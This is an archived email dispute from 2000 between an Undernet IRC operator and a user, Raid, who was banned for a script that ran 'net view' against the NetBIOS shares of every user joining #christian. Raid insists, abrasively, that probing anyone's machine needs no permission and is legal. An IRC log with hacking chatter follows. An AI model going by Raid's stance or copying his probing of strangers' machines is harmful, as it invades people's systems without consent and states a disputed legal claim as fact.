Undernet does. If you read the motd of most servers, you'll see that it is discussed there. If users don't want to be scanned for the most commonly abused ports being open, they are free to disconnect to Undernet. You made none of this information available to people who entered the channel and you had no permission from them to scan their machines.

>I didn't map any of his drives to my >system. (I only knew that he had that available). I >was nice enough to tell him he had a problem. > Calling someone a lamer doesn't sound like my idea of nice and telling them to "consider this a threat" doesn't sound very kind either.

>It's obvious you have a personal problem with me, >That's fine. Still not a reason for you to abuse your >own networks policy and gline me for it Glining me >from your server would be different, but... Personal >problems can easily be resolved via ignore.

I don't have a personal problem with you so the rest of the above paragraph is of no concern. My problem with you was that you were sitting on Undernet scanning the machines of each person joining a channel. >Not to >mention the fellow you glined last night for swearing >in a channel you don't even op in. I've got that log >too ;p > >I've also heard from others (and I'm sure they have >logs) that you've been abusing your Oline for some >time now. glining people for channel matters; Of which >you have no status in. Just because you "hangout" in a >channel doesn't give you the right to gline people >from the entire undernet; Thats what the channel has >ops for. > I was told yesterday that I had been accepted as an Op in #christian. I have now declined that offer until this matter is settled. Once again, scanning for open ports and then intimidating the machine owner when they say something you dislike borders on extortion and it's certainly not something I can sit by and idly watch. If you weren't on undernet, you wouldn't know who joined the channels here.

>I carbon copied this email to Gator, I simply don't >trust you enough to send him copies of this entire >email. You quoted me out of context once already. I've carbon copied him on this as well. and

Gator is a very good person

does many things for Undernet that he never gets praise he deserves. What you may not be aware of is that both Gator and I got copies of Chaplians log files sent to abuse the day before. We both have access to the chat long in full context. We both read email sent to [email protected] > >The log file is kinda large; scroll down for the >relevant info. Many of us who work on the net do not open attachments for obvious reasons. I'm sure there is nothing malicious in your logs, but it's just a rule of thumb we use to avoid problems. The reason I got involved in this was because you were not only scanning people without permission as they entered that channel, but also because you were using the information from those scans to threaten people when they did not behave in the manner you desired. If you have indeed stopped scanning people as they enter a channel, you have solved the problem that was my issue. CiCi From John Grahms Sun Sep 10 20:58:49 2000 Received: from [205.245.105.248] by web1603.mail.yahoo.com; Sun, 10 Sep 2000 20:58:49 PDT Date: Sun, 10 Sep 2000 20:58:49 -0700 (PDT) From: John Grahms | Block address Subject: Re: [Abuse] Hello To: "L. Maurer" MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Length: 10980 Add Addresses

--- "L. Maurer" wrote: > Then explain how you were pasting back private chat > logs that Chaplain had with others :/ When I first You care to back this up with some Evidence CiCi? Any logs created by my machine are available for my use; You don't have any say with that I do with material I log. You don't own not one single file present on my machine, and that includes logs of us chatting. I log for a reason, and this my dear is one of them.

> > > >

this, you told me you wouldn't have done anything to him but because he was a smart alec, or something of that nature, you thought you were within your right to do this.

You can't tell me "don't be a smartass" to someone, Sorry. It's not illegal nor against undernet policy to treat somebody with less then perfect respect. Go nanny somebody else. > Just because you CAN hit a child doesn't mean > it's the proper thing to do and most of our undernet > guests are virtual children. We don't take advantage > of that fact. I didn't hit anybody. And I'm getting pretty sick and tired of your bullshit excuses CiCi. Admit it, You don't like me, so You gline me. > > > >

I'm not Chaplain. Get your people straight. There is more than one person here who has been effected by your actions and AFAIK Chaplain isn't reading this email.

You wanna back this one up as well Please? I like evidence, I'm a strong believer in it. The more BS you talk (which btw, you can't actually backup) the less respect I have for you. > I told you nothing of the sort. Once again, get your > people straight. OH YES, Yes you did. I have that Log at work; I shall retrieve it. You made it perfectly clear in your own words that I had been reported (laugh laugh) to the authorities for my "hacking" chaplain. > It is my understanding that Chaplain has contacted > his church's attorney and that since you both live > in the same state, there is merit for suit. Cici, I've been as patient and forgiving as I'm going to be. The rest of this email may be rude; I'm not trying any longer to make it not be. Had you looked at all on the laws governing this state; Chaplain hasn't got a pot to piss in. However, I can and will win a counter suit; Although I know churches don't have alot of money, I'll counter sue for the point of it. > OK, if you weren't using undernet bandwidth, explain > how you knew the IP/host information of the people *yawn* Remember when I said I had lost my patience? Well, get ready for a computer lesson; Seems damn time somebody told you. It doesn't use undernet bandwidth to /whois someone, nor does it really do anything when you /dns somebody. My script didn't use any of your precious bandwidth, because (oh dense one) it establishes direct connection via a socket call. Shall I get any more technical, or can you understand this?

> their consent. The > "consent" part is the difference between your scans

> and the proxy scans Undernet does. If you read the > motd of most servers, you'll see that it is discussed > there. Indeed I have, and guess what. If somebody really wanted to "sue" undernet for scanning them, your motd wouldn't do shit for you. Know why? Because it's like a shrinkwrap software license; It won't actually hold up in court. But it sounds good.

> to Undernet. You made > none of this information available to people who > entered the channel and you had no permission from > them to scan their machines. Technically, I didn't scan anybody. Second, I don't actually need their permission to scan them. It's not illegal to port scan any machine you desire. It becomes illegal if you attempt to gain unauthorized entry into the machine once you have scanned It. scanning is like knocking on the door or calling somebodys house to see if there home. For an ircop, You really don't know much about the internet, nor the laws gonverning it. > Calling someone a lamer doesn't sound like my idea > of nice and telling them to "consider this a threat" > doesn't sound very kind either. Still quoting me out of context? :) Why don't you email us a copy of the entire log cici, so we can put it in the proper context. I was nice enough to tell him he had a problem to begin with; You seem to have a very hard time with this very very simple concept. I really don't know what to think of you anymore. I already know your computer knowledge leaves much to be desired, and in my opinion; You aren't qualified to be an ircop. But lucky for you, It's not in my power to make those decisions. > I don't have a personal problem with you so the rest > of the above paragraph is of no concern. I'm not letting you wiggle out of this CiCi. Glining me went a little too far. According to the wonderful christian log, You glined me after I had already told you (after your attempt to start shit with me when I joined) that the script was no longer scanning anybody. I set away to get some food, then you glined me. You can't get out of it. That's how it went down, and you know it.

> My problem with you was that you were sitting on > Undernet scanning the machines of each person joining > a channel. I'm an op in several security related channels, It is our channels policy to scan all visitors; or they are not welcome. My script does not currently distinquish

between only those channels and all channels I might be visiting in. However, it is to be said; You and Chaplain are the ONLY people I've scanned and informed they had a problem that weren't happy to know. They say I suppose that ignorance is bliss, but in the computer age; this will kill you. Your problem with me is a personal one, Otherwise you would not have glined me yesterday; As you knew well infact that I was no longer scanning anybody (As I had told you). How do you defend that gline anyway CiCi? What undernet rule at the time was I in violation of? Please, enlighten me :) > I was told yesterday that I had been accepted as an > Op in #christian. I don't know. I was speaking with the channel administrator; He assured me I'd have no further problems from you. :) Whether your op status is affected isn't my concern, I just don't want any more hassle from you. I know you've overstepped your authority, and you know it. > I have now declined that offer until this matter is > settled. The matter can easily be settled, Don't gline me for bullshit, and apologize for the bullshit gline you did set on me, and I'll drop the entire issue. > Once again, scanning for open ports and then > intimidating the machine owner when they say > something you dislike borders on extortion and it's I didn't scan for open ports. Computer lesson number 2 (seems you can't learn any other way, I am forced to be rude) my script sent net view ''$ip one time, which attempts to connect to port 139; For Netbios information, NOT OOB nuking. I already know this is above you, But I'm going to explain exactly what I did anyway; Just because it's beyond you doesn't mean somebody else reading this email won't understand what I'm talking about. And again, I must ask you to provide proof that I was intimidating anybody. Sigh, I lose more and more respect for you with each email me thinks. I don't extort anybody. > If you weren't on undernet, you wouldn't know who > joined the channels here. I've been a regular on undernet for several years. I've never had a problem like this before. And it's not really a problem... You had no valid reason to gline me, and you did; And I'm going to press this issue until it's resolved. If that means I have to make you look like a total idiot with regard to computers, I'll do so (mind you, it wouldn't take any effort; These emails and the logs I have show it without a doubt). A wrong must be righted. CiCi, You know your gline was not legit. You know it.

I know it. Why don't you apologize for doing it? It seems like a christian thing to do. > I've carbon copied him on this as well. Gator is a > very good person and does many things for Undernet > that he never gets praise he deserves. I've known gator for sometime, he knows some associates I used to frequent with. WarBlade and crew... > What you may not be aware of is that both Gator and > I got copies of Chaplians log files sent to abuse > the day before. We both have access to the chat Then why are you still quoting it out of context? I didn't do anything illegal to Chaplain; I may have saved him some serious downtime. I do admit tho, If I had known I'd be in this BS for doing it, I'd have not said not one word. In the future, I'll keep my mouth shut. Ignorance is bliss, right? :)

> Many of us who work on the net do not open > attachments for obvious reasons. A LOG file is a text file, opening it in notepad will not infect you. Please don't force me to give you a lesson in virus terminology. I have very good withstanding creditials in that field. How many "scriptkiddys" (thats what you called me once right? ;p) do you know in Rolling Stone magazine? :-) > I'm sure there is nothing malicious in your logs, > but it's just a rule of thumb we use to avoid >problems. Lack of education creates rules that are sometimes not necessary. > The reason I got involved in this was because you > were not only scanning people without permission as > they entered that channel (a) I don't need their permission. and (b) I don't even have to tell them either beforehand or after that I scanned them. And I don't scan people. > but also because you were using the information from > those scans to threaten people when they did not > behave in the manner you desired. Nice try! I didn't threaten anybody; I helped his sorry ass out. I didn't use any of the information in any illegal nor immoral manner. I did a christian thing a told the bastard he had a problem. I should have let him suffer with it. Stupidty seems to be uncurable. > If you have indeed stopped

> scanning people as they enter a channel, you have > solved the problem that was my issue. Your "issue" isn't of any concern to me anymore. Your gline and abuse of oline is. You glined me after I already told you I stopped, thats just plain outright wrong. I wasn't doing anything against undernet policy to begin with, but to gline me after I already said I wasn't doing it anymore is bullshit. Espicially since you didn't gline me on entry, you said a wiseass comment about me in open channel. When I responded I was glined shortly there after. And I bet without a doubt; it had nothing whatsoever to do with chaplain. I strongly suspect you didn't like my response to your wiseass comment. If theres a lesson to be learned here, it's to allow the stupid and ignorant to remain that way; It's for the best. Regards, Raid PS: I didn't have time to enter gators email; I'm trusting you to send him this intact... See if you can do that. Ok?

__________________________________________________ Do You Yahoo!? Yahoo! Mail - Free email you can access from anywhere! http://mail.yahoo.com/

From L. Maurer Sun Sep 10 21:17:04 2000 X-Apparently-To: [email protected] via web1601.mail.yahoo.com Received: from mail.airmail.net (206.66.12.40) by mta430.mail.yahoo.com with SMTP; 11 Sep 2000 02:00:47 -0700 (PDT) Received: from faith from [204.181.101.66] by mail.airmail.net (/\##/\ Smail3.1.30.16 #30.438) with smtp for sender: id <mT/[email protected]>; Sun, 10 Sep 2000 23:15:13 -0500 (CDT) Message-Id: <[email protected]> X-Sender: [email protected] X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Sun, 10 Sep 2000 23:17:04 -0500 To: [email protected] From: "L. Maurer" | Block address Subject: Re: [Abuse] Hello CC: [email protected] Mime-Version:

1.0 Content-Type: text/plain; charset="us-ascii" Content-Length: 12373 Add Addresses

Here's a copy of this kid's latest crap. I've had enough of this. Sitting in a channel and port scanning everyone who joins is not a good thing. Continuing his arguement with me about it is totally stupid. Lisa

>X-Persona: >Return-Path: >Received: from web1603.mail.yahoo.com from [128.11.23.203] by mail.airmail.net > (/\##/\ Smail3.1.30.16 #30.438) with smtp for sender: > id <mP/[email protected]>; Sun, 10 Sep 2000 22:45:07 -0500 (CDT) >Received: (qmail 26157 invoked by uid 60001); 11 Sep 2000 03:58:49 -0000 >Message-ID: <[email protected]> >Received: from [205.245.105.248] by web1603.mail.yahoo.com; Sun, 10 Sep 2000 20:58:49 PDT >Date: Sun, 10 Sep 2000 20:58:49 -0700 (PDT) >From: John Grahms >Subject: Re: [Abuse] Hello >To: "L. Maurer" >MIME-Version: 1.0 >Content-Type: text/plain; charset=us-ascii >X-Airmail-Delivered: Sun, 10 Sep 2000 22:45:07 -0500 (CDT) >X-Airmail-Spooled: Sun, 10 Sep 2000 22:45:07 -0500 (CDT) > > >--- "L. Maurer" wrote: > >> Then explain how you were pasting back private chat >> logs that Chaplain had with others :/ When I first >You care to back this up with some Evidence CiCi? Any >logs created by my machine are available for my use; >You don't have any say with that I do with material I >log. You don't own not one single file present on my >machine, and that includes logs of us chatting. I log >for a reason, and this my dear is one of them. > >> this, you told me you wouldn't have done anything to >> him but because he was a smart alec, or something of >> that nature, you thought you were within your right >> to do this. > >You can't tell me "don't be a smartass" to someone,

>Sorry. It's not illegal nor against undernet policy to >treat somebody with less then perfect respect. Go >nanny somebody else. > >> Just because you CAN hit a child doesn't mean >> it's the proper thing to do and most of our >undernet > guests are virtual children. We don't take >advantage > of that fact. > >I didn't hit anybody. And I'm getting pretty sick and >tired of your bullshit excuses CiCi. Admit it, You >don't like me, so You gline me. > >> I'm not Chaplain. Get your people straight. There >> is more than one person here who has been effected >> by your actions and AFAIK Chaplain isn't reading >> this email. > >You wanna back this one up as well Please? I like >evidence, I'm a strong believer in it. The more BS you >talk (which btw, you can't actually backup) the less >respect I have for you. > >> I told you nothing of the sort. Once again, get your >> people straight. > >OH YES, Yes you did. I have that Log at work; I shall >retrieve it. You made it perfectly clear in your own >words that I had been reported (laugh laugh) to the >authorities for my "hacking" chaplain. > >> It is my understanding that Chaplain has contacted > >his church's attorney and that since you both live > >in the same state, there is merit for suit. > >Cici, I've been as patient and forgiving as I'm going >to be. The rest of this email may be rude; I'm not >trying any longer to make it not be. Had you looked at >all on the laws governing this state; Chaplain hasn't >got a pot to piss in. However, I can and will win a >counter suit; Although I know churches don't have alot >of money, I'll counter sue for the point of it. >> OK, if you weren't using undernet bandwidth, explain >> how you knew the IP/host information of the people >*yawn* Remember when I said I had lost my patience? >Well, get ready for a computer lesson; Seems damn time >somebody told you. It doesn't use undernet bandwidth >to /whois someone, nor does it really do anything when >you /dns somebody. My script didn't use any of your >precious bandwidth, because (oh dense one) it >establishes direct connection via a socket call. Shall >I get any more technical, or can you understand this? > > >> their consent. The >> "consent" part is the difference between your scans >> and the proxy scans Undernet does. If you read the > >motd of most servers, you'll see that it is discussed >> there. > >Indeed I have, and guess what. If somebody really >wanted to "sue" undernet for scanning them, your motd >wouldn't do shit for you. Know why? Because it's like

>a shrinkwrap software license; It won't actually hold >up in court. But it sounds good. > > >> to Undernet. You made >> none of this information available to people who >> entered the channel and you had no permission from > >them to scan their machines. > >Technically, I didn't scan anybody. Second, I don't >actually need their permission to scan them. It's not >illegal to port scan any machine you desire. It >becomes illegal if you attempt to gain unauthorized >entry into the machine once you have scanned It. >scanning is like knocking on the door or calling >somebodys house to see if there home. For an ircop, >You really don't know much about the internet, nor the >laws gonverning it. > >> Calling someone a lamer doesn't sound like my idea >> of nice and telling them to "consider this a >threat" > doesn't sound very kind either. > >Still quoting me out of context? :) Why don't you >email us a copy of the entire log cici, so we can put >it in the proper context. I was nice enough to tell >him he had a problem to begin with; You seem to have a >very hard time with this very very simple concept. I >really don't know what to think of you anymore. I >already know your computer knowledge leaves much to be >desired, and in my opinion; You aren't qualified to be >an ircop. > >But lucky for you, It's not in my power to make those >decisions. > >> I don't have a personal problem with you so the rest >> of the above paragraph is of no concern. > >I'm not letting you wiggle out of this CiCi. Glining >me went a little too far. According to the wonderful >christian log, You glined me after I had already told >you (after your attempt to start shit with me when I >joined) that the script was no longer scanning >anybody. I set away to get some food, then you glined >me. You can't get out of it. That's how it went down, >and you know it. > > >> My problem with you was that you were sitting on > >Undernet scanning the machines of each person joining >> a channel. > >I'm an op in several security related channels, It is >our channels policy to scan all visitors; or they are >not welcome. My script does not currently distinquish >between only those channels and all channels I might >be visiting in. However, it is to be said; You and >Chaplain are the ONLY people I've scanned and informed >they had a problem that weren't happy to know. They >say I suppose that ignorance is bliss, but in the >computer age; this will kill you. >

>Your problem with me is a personal one, Otherwise you >would not have glined me yesterday; As you knew well >infact that I was no longer scanning anybody (As I had >told you). How do you defend that gline anyway CiCi? >What undernet rule at the time was I in violation of? >Please, enlighten me :) > >> I was told yesterday that I had been accepted as an >> Op in #christian. > >I don't know. I was speaking with the channel >administrator; He assured me I'd have no further >problems from you. :) Whether your op status is >affected isn't my concern, I just don't want any more >hassle from you. I know you've overstepped your >authority, and you know it. > >> I have now declined that offer until this matter is >> settled. > >The matter can easily be settled, Don't gline me for >bullshit, and apologize for the bullshit gline you did >set on me, and I'll drop the entire issue. > >> Once again, scanning for open ports and then > >intimidating the machine owner when they say > >something you dislike borders on extortion and it's >I didn't scan for open ports. Computer lesson number 2 >(seems you can't learn any other way, I am forced to >be rude) my script sent net view ''$ip one time, which >attempts to connect to port 139; For Netbios >information, NOT OOB nuking. I already know this is >above you, But I'm going to explain exactly what I did >anyway; Just because it's beyond you doesn't mean >somebody else reading this email won't understand what >I'm talking about. > >And again, I must ask you to provide proof that I was >intimidating anybody. Sigh, I lose more and more >respect for you with each email me thinks. I don't >extort anybody. > >> If you weren't on undernet, you wouldn't know who > >joined the channels here. > >I've been a regular on undernet for several years. >I've never had a problem like this before. And it's >not really a problem... You had no valid reason to >gline me, and you did; And I'm going to press this >issue until it's resolved. If that means I have to >make you look like a total idiot with regard to >computers, I'll do so (mind you, it wouldn't take any >effort; These emails and the logs I have show it >without a doubt). A wrong must be righted. > >CiCi, You know your gline was not legit. You know it. >I know it. Why don't you apologize for doing it? It >seems like a christian thing to do. > >> I've carbon copied him on this as well. Gator is a >> very good person and does many things for Undernet > >that he never gets praise he deserves. >

>I've known gator for sometime, he knows some >associates I used to frequent with. WarBlade and >crew... > >> What you may not be aware of is that both Gator >and > I got copies of Chaplians log files sent to >abuse > the day before. We both have access to the >chat > >Then why are you still quoting it out of context? I >didn't do anything illegal to Chaplain; I may have >saved him some serious downtime. I do admit tho, If I >had known I'd be in this BS for doing it, I'd have not >said not one word. In the future, I'll keep my mouth >shut. Ignorance is bliss, right? :) > > > > >> Many of us who work on the net do not open >> attachments for obvious reasons. > >A LOG file is a text file, opening it in notepad will >not infect you. Please don't force me to give you a >lesson in virus terminology. I have very good >withstanding creditials in that field. How many >"scriptkiddys" (thats what you called me once right? >;p) do you know in Rolling Stone magazine? :-) > >> I'm sure there is nothing malicious in your logs, >> but it's just a rule of thumb we use to avoid >>problems. > >Lack of education creates rules that are sometimes not >necessary. > >> The reason I got involved in this was because you >> were not only scanning people without permission as >> they entered that channel > >(a) I don't need their permission. and (b) I don't >even have to tell them either beforehand or after that >I scanned them. And I don't scan people. > >> but also because you were using the information from >> those scans to threaten people when they did not > >behave in the manner you desired. > >Nice try! I didn't threaten anybody; I helped his >sorry ass out. I didn't use any of the information in >any illegal nor immoral manner. I did a christian >thing a told the bastard he had a problem. I should >have let him suffer with it. Stupidty seems to be >uncurable. > >> If you have indeed stopped >> scanning people as they enter a channel, you have >> solved the problem that was my issue. > >Your "issue" isn't of any concern to me anymore. Your >gline and abuse of oline is. You glined me after I >already told you I stopped, thats just plain outright >wrong. I wasn't doing anything against undernet policy

>to begin with, but to gline me after I already said I >wasn't doing it anymore is bullshit. Espicially since >you didn't gline me on entry, you said a wiseass >comment about me in open channel. When I responded I >was glined shortly there after. And I bet without a >doubt; it had nothing whatsoever to do with chaplain. >I strongly suspect you didn't like my response to your >wiseass comment. > >If theres a lesson to be learned here, it's to allow >the stupid and ignorant to remain that way; It's for >the best. > >Regards, >Raid > >PS: I didn't have time to enter gators email; I'm >trusting you to send him this intact... See if you can >do that. Ok? > > >__________________________________________________ >Do You Yahoo!? >Yahoo! Mail - Free email you can access from anywhere! >http://mail.yahoo.com/ > From John Grahms Mon Sep 11 05:51:48 2000 Received: from [205.245.105.248] by web1609.mail.yahoo.com; Mon, 11 Sep 2000 05:51:48 PDT Date: Mon, 11 Sep 2000 05:51:48 -0700 (PDT) From: John Grahms | Block address Subject: Re: [Abuse] Hello To: "L. Maurer" MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Length: 813 Add Addresses

--- "L. Maurer" wrote: > Here's a copy of this kid's latest crap. I've had > enough of this. Sitting in a channel and port > scanning everyone who joins is not a good thing. > Continuing his arguement with me about it is totally > stupid. This Kid isn't a kid. As I've told you once already. Your quiet correct; This entire arguement is stupid, You don't know the difference between port scanning and netbios; and you don't know a damn thing about netbios. Your clearly not qualified for your position.

You can have enough of it all you like, I didn't port scan anyone and I'd strongly suggest you learn what port scanning is. Regards, Raid From John Grahms Wed Sep 13 09:55:45 2000 Received: from [208.25.255.2] by web1608.mail.yahoo.com; Wed, 13 Sep 2000 09:55:45 PDT Date: Wed, 13 Sep 2000 09:55:45 -0700 (PDT) From: John Grahms | Block address Subject: Re: [Abuse] Hello To: "L. Maurer" CC: [email protected] MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="0-424238335-968864145=:3039" Content-Length: 22567 Add Addresses

--- "L. Maurer" wrote: > Here's a copy of this kid's latest crap. I've had > enough of this. Sitting in a channel and port > scanning everyone who joins is not a good thing. > Continuing his arguement with me about it is totally > stupid. Hi Lisa, How many times do I have to tell you I'm not a kid? :) When will you learn this? That log where you said I would be contacted by the authorities has been attached. I've also forwarded an email from you to the administration of Christian; They were as shocked to find you had been accepted as an Op as I was. Next time you try Bsing your way out of something, make sure you have all your bases covered. You also asked in a previous email to me How I was showing private logs between chaplain and somebody else? I didn't read that section of the email beforehand; I've gone back and read them. How DARE you even accuse me of something like that? I did NOT at any time get any logs that my computer didn't create. And I am requesting, Nay.. Demanding you show some proof for these outrageous claims you've made against me.

You realize CiCi, it's a good thing from a legal/money aspect this is IRC; Because if you were pulling this shit in real life, I'd sue the living shit out of you. Since I don't normally log from work, what is attached is a buffer save. (I saved it just after you left the channel, I figured it would come in handy). I'm looking forward to your next installment of lies. Regards, Raid PS: I've carbon copied this email to myself For archive purposes.

__________________________________________________ Do You Yahoo!? Yahoo! Mail - Free email you can access from anywhere! http://mail.yahoo.com/

-- I don't remember when this took place or how it really fits into my article. LoL. Ah well. Session Start: Sat Sep 09 00:00:00 2000 [00:00] <Jubei> I don't like the appointed senate [00:00] then it was passed to the public, where it became affectionatly known as the internet and the public made it boom [00:00] <Jubei> Nor do I like the heavy beauracracy... but for all that it's okay [00:00] gen|c0de: it was called ARPAnet [00:00] *** fayth ([email protected]) has joined #christian [00:00] lan.. im just tired of the jr thing. he's not a jr, whereas mr al gore IS [00:00] arpa [00:00] yea [00:00] sorry [00:00] or DARPA.. i can't remember... darpanet i think [00:00] *** `Paradox ([email protected]) has left #christian [00:00] it was ARPAnet [00:00] it was just arpa [00:01] regardless [00:01] and it didn't have a .net [00:01] vote: how bout we just call him Bubba? ;) [00:01] <Jubei> Though my government could certainly use reform... but then there has never been a perfect government either [00:01] dubya is fine with me [00:01] clinton is bubba [00:01] no.. I said BUBBA ;) [00:01] Jubei, no, trying to say that Neo in the matrix was more like what the Jewish messiah was percieved to be, rather than what jesus was like [00:01] *** cierra ([email protected]) has left #christian [00:01] <Jubei> Lanfear> Check side window please [00:01] net not .net [00:01] <Jubei> Ah, I never saw the Matrix [00:01] one of my professors is getting millions of dollars in research funding for creating new faster networks for the military [00:01] i know whatcha said [00:01] a warleader, destined to free his people [00:01] darpa is funding him

[00:01] the military doesnt need speed [00:01] ok gen I"m sure you know more than I do, I was only trained by the folks involed in arpa :) [00:02] jubei: I don't see anything in it from you recently [00:02] CiCi: is that why you didnt even know about netbios shares? [00:02] gen|c0de: what it is about is creating high speed wireless networks in battlezones.... [00:02] *** `Ash` ([email protected]) has left #christian [00:02] <Jubei> Dovi> I don't think that's what the jews beleived at all. The young hot-headed jews who want to fight maybe, but not the jewish religious authorities or scholars [00:02] that's what he's doing [00:02] ah, Jubei you should see it. Excellent film, raised the standards for movie sf :) [00:02] damrekcah: doesnt matter they cant secure it worth a shit [00:02] *** wallace-7 ([email protected]) has left #christian [00:02] the enemy will use their bandwidth [00:03] lol [00:03] gen|c0de watch the language [00:03] *** HARDPENIS ([email protected]) has joined #christian [00:03] *** logos3 sets mode: +b HARDPENIS!*@* [00:03] gen I know about netbios shares :) and I don't threaten to destroy people's machines when they're open... it's called maturity, mabe you've heard of it [00:03] *** HARDPENIS was kicked by logos3 (banned: That nick is inappropriate on this channel) [00:03] *** BrownEye ([email protected]) has joined #christian [00:03] *** Colin^ sets mode: +b *!*DIE@*.rcn.com [00:03] *** BrownEye was kicked by logos3 (Banned) [00:03] *** ramdac ([email protected]) Quit (Ping timeout for ramdac[1Cust114.tnt2.ruston.la.da.uu.net]) [00:03] CiCi: speaking of maturity, was that supposed to be a subtle insult? [00:03] *** Maverick ([email protected]) has joined #christian [00:03] <Jubei> They just beleived in the rise of a ruler that would guarantee the establishment of good and order in the world. [00:03] raid is a little ummm...how would you say? quick to jump the gun? [00:03] but hes a good guy [00:04] shrug [00:04] gen|c0de: do you honestly believe that we can't secure our networks? we have tons of phds working on this project... all of which probably know maybe *a little* bit more about computer networks than you do [00:04] gen I've had enough of your crap both in private message and in this channel, I'm leaving and I hope you learn manners soon [00:04] *** CiCi ([email protected]) has left #christian [00:04] depends, Jubei. I'd have to research a bit more on that. [00:04] *** newzeal ([email protected]) has joined #christian [00:04] <Maverick> Back. [00:05] <PaganJoy> wb Maverick [00:05] doo de dop bu dee doo le da dit de doo [00:05] hmm. Really, there's no such thing as a "secure network", so long as it is connected to the outside world in some way [00:05] wb Mav [00:05] *** Nell` ([email protected]) Quit (Wishing you peace, love and Souuuuuuuulll train! - Don Cornelius) [00:05] <Maverick> Thanks. [00:05] rts: thats supposed to be one of the first things you learn regarding networks. [00:05] * Lanfear` thinks cici is starting to sound like chap ;) [00:05] rts: but its not connected to the outside world!!!!!!! we aren't talking about the internet here [00:05] Lanfear`: careful now, she might gline you. ;p [00:05] damrekcah: I think that the recent attacks against like the pentagon and the whitehouse where people used techniques that are wicked outdated to get access to the server proves we dont

[00:05] is anyone doing something fun this weekend? [00:06] Raid: indeed [00:06] cici: ive been very respectful towards you, to the point where its almost making me sick, and Im the one who needs to learn manners? [00:06] damrekcah: your network is in no way connected to the outside? [00:06] The only secure (as can be) computer is one that has NO outside connection. [00:06] not even a dialup one. [00:06] *** ^dan- ([email protected]) has joined #christian [00:06] gen|c0de she is gone [00:06] oh [00:06] *** Colin^ sets mode: +b *!*[email protected].* [00:06] *** fayth was kicked by Colin^ (message me please) [00:06] not my network, the high speed military network they are developing [00:06] the wireless done [00:06] one [00:06] ah yes [00:07] soon we will have wireless network sniffers [00:07] wont even have to be connected to the network [00:07] *** ironic^^ ([email protected]) has joined #christian [00:07] it can be secured [00:07] heh... just send a flock of birds up to knock that one down :) [00:07] damrekcah: do you remember when whitehouse.gov got defaced? [00:07] since wireless is broadcast by radio wave......you will open yourself to all kinds of security holes [00:08] no, but whitehouse.gov isn't part of the pentagon and dod which has a lot of sensitive info [00:08] *** logos3 sets mode: -b HARDPENIS!*@* [00:08] that attack was VERY old ( phf exploit ) you can hardly find any computer still running it [00:08] ok dam [00:08] a while back DISA I believe it was got hacked [00:08] wanna know how? [00:08] eventually the safest thing to do, if you need high security, would probably be to store records offline :) [00:08] * Maverick checks out the Matrix as Messiah movie site. [00:08] * Maverick takes the Red Pill. [00:08] red pill eh? [00:08] the attacked an employee's home computer and then let him log in [00:08] the pentagon's be hacked thousands of times [00:09] only a few have gone public [00:09] gen|c0de the pentagon and DOD have security holes on different levels on purpose so they can catch the people [00:09] the most public one used brute force cracking, which is a form of password guessing [00:09] damrekcah: Uhh, No... [00:09] *** HotPink ([email protected]) has joined #christian [00:09] hey [00:09] damrekcah: its called a honeypot, and none of what ive mentioned we honeypots [00:09] damrekcah: If you believe most of the hackers get caught, your sadly mistaken. [00:09] hey hotpink [00:10] hi hotpink [00:10] when the whitehouse got hacked [00:10] raid: i'm not saying that.. i'm just saying how its setup [00:10] it was by stupid people [00:10] i'm tired of talking about this [00:10] i know them [00:10] they got caught [00:10] lol [00:10] i'm going to listen to some music [00:10] bye [00:10] *** damrekcah ([email protected]) has left #christian

[00:10] yo [00:10] but what about the hundreds of attacks that followed their arrest [00:10] no offense [00:11] but how come christians get huffy puffy and leave when their wrong? [00:11] not all christians do [00:11] please don't generalize [00:11] gen|c0de: even if they're right: it's the disagreement they don't like, I think [00:11] yes, i shouldnt have generalized [00:11] were humans just like anyone else with opinions [00:12] rts: I just moved away from tulsa ok, they love to argue when their right [00:12] sorry again generalizitation [00:12] i used to work next door to oral roberts university [00:12] it's cool [00:12] just making a point [00:12] :) [00:12] gen|c0de: heh. Looneyville by the sounds of it [00:12] well accross the street [00:12] rts: they've got two of the largest christian colleges there are [00:13] gen|c0de: they = Tulsa or they = Oral Roberts? [00:13] ah yes rheama ( sp? ) [00:13] tula [00:13] oru is one of the colleges [00:13] *** creeper has left IRC [00:13] rheama bought just about everything in this town [00:13] *** Kozubchik ([email protected]) has joined #christian [00:13] *** ^dan- is now known as dan[00:13] and strictly restricts it to rheama students [00:13] forgive me, but "Christian College" sounds like "military intelligence" to me :) [00:13] Hi ya Kozubchik [00:13] -> *dan-* back now? [00:13] lol rts [00:13] well [00:13] it is [00:14] i fully intend on [00:14] going to [00:14] a christian college [00:14] *** laura7 ([email protected]) has joined #christian [00:14] which one [00:14] rts, nah,, thats how georgetown, yale, etc started as, remeber? :) [00:14] trinity christian college [00:14] * Vote4Bush is going to a Christian college next fall [00:14] *** Disconnected [00:14] * Raid is away since 00:14:31 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be saved. [00:14] *** Attempting to rejoin... [00:14] * Raid has returned ( Auto-Away: Not here ) - on 00:14:34 @ 09/09/2000 - Away 0 minutes. #Christian Cannot send to channel [00:14] *** Rejoined channel #christian [00:14] *** Topic is 'Encourage each other daily. (Hebrews 3:13)' [00:14] *** Set by Beukeboom on Fri Sep 08 03:42:55 [00:14] -logos3- http://www.forchrist.net - channel website, for rules and other info. [00:14] i will probably go to johnson bible college in knoxville TN [00:14] wb Raid [00:14] sigh [00:14] Vote4Bush: It's an interesting place. [00:14] don't go to milligan [00:15] HotPink: youd be better off going to a regular college, most of the people ive encounterd at those colleges are far from what youd call a christian [00:15] *** Colin^ sets mode: -b *!Hell@*.sympatico.ca [00:15] lol im not going to milligan [00:15] they get their all hot for jesus [00:15] *** ironic^^ ([email protected]) Quit (Ping timeout for ironic^^[203.170.14.152])

